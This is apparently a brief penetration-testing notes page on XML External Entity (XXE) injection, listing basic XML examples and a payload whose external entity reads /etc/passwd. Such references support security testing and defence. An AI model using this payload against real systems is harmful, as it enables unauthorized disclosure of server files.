XML External Entity Injection (XXE)
Payloads
Basic XML Examples
<!--?xml version="1.0" ?-->
<userInfo>
<firstName>Parz</firstName>
<lastName>ival</lastName>
</userInfo><?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">]
>
<methodCall><methodName>&test;</methodName></methodCall><!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY parzival SYSTEM "file:///etc/passwd"> ]>
<data>&parzival;</data>Introductions to XXE
References
Last updated